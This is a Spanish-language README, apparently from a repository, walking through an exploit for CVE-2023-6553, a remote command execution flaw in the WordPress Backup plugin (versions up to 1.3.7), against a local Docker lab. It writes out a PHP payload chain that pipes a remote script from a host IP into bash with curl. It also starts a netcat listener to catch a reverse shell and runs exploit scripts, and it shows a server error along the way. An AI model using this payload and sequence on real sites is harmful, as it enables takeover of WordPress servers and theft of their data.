
Desarrollo de exploits para CVE-2023-6553 en el plugin de Backup de Wordpress
Desarrollo de exploit para CVE-2023-6553 en el plugin Backup en Wordpress
Esto es una CVE crítica con una puntuación CVSS de 9.8
La vulnerabilidad permite al atacante enviar comandos al servidor que ejecuta la versión vulnerable del plugin
Versión vulnerable Backup <= 1.3.7
Clona el repositorio
Ejecuta el siguiente comando para levantar los contenedores Docker
docker-compose up -d
Deberías ver 2 contenedores Docker
http://localhost:8000/
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
python3 -m http.server
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
HTTP Response Body: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>
Esto se debe a que después de las conversiones del filtro, el tamaño de la cabecera supera el límite permitido por el servidor.
nc -nlvp 8080
y ahora ejecuta el comando para explotar el plugin vulnerable
python3 final_exploit.py